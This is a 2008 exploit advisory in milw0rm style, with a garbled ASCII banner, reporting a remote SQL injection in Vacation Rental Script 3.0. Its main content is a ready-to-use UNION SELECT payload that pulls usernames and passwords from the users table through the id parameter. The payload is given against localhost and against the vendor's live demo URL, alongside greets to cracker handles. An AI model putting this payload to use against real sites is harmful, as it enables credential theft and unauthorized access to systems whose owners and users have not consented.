????????????????????????????????????????????????????????????????????????????????????? ?? C r a C k E r ?? ?? T H E C R A C K O F E T E R N A L M I G H T ?? ???????????????????????????????????????????????????????????????????????????????????? ????? From The Ashes and Dust Rises An Unimaginable crack.... ????? ???????????????????????????????????????????????????????????????????????????????????? ?? [ Remote SQL Injection ] ?? ???????????????????????????????????????????????????????????????????????????????????? : Author : CraCkEr : : : ? Group : N/A ? ? ? ? Script : Vacation Rental Script 3.0? ? Register Globals : ? ? Download : vacationrentalscript.com ? ? ? ? Method : GET ? ? [?] ON [ ] OFF ? ? Critical : High [????????] ? ? ? ? Impact : System access ? ? ? ? ???????????????????????????????????????? ??????????????????????????????????????? ? ? DALnet #crackers ?? ???????????????????????????????????????????????????????????????????????????????????? : : ? Release Notes: ? ? ????????????? ? ? Typically used for remotely exploitable vulnerabilities that can lead to ? ? system compromise. ? ? ? ???????????????????????????????????????????????????????????????????????????????????? ?? Exploit URL's ?? ???????????????????????????????????????????????????????????????????????????????????? [SQL] http://www.localhost.com/path/index.php?obj=sections&id=-1 UNION SELECT concat(username,0x3a,password) FROM users-- Live DEMO: http://www.vacationrentalscript.com/demo/index.php?obj=sections&id=-1 UNION SELECT concat(username,0x3a,password) FROM users-- ???????????????????????????????????????????????????????????????????????????????????? Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL . ???????????????????????????????????????????????????????????????????????????????????? ?? © CraCkEr 2008 ?? ???????????????????????????????????????????????????????????????????????????????????? # milw0rm.com [2008-08-10]